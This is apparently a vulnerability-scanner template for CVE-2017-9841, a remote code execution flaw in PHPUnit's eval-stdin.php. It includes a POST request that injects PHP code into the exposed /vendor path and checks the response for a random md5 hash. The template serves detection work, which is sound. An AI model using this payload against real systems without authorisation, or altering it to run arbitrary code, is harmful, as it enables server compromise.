Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
PoC代码[已公开]
id: CVE-2017-9841
info:
name: phpunit rce
author: p0wd3r,buchixifan
severity: high
description: |-
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-9841
tags: cve,cve2017,phpunit,rce
created: 2023/08/10
set:
rand: randomInt(2000000000, 2100000000)
rules:
r0:
request:
method: POST
path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
body: <?=print(md5({{rand}}));?>
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
expression: r0()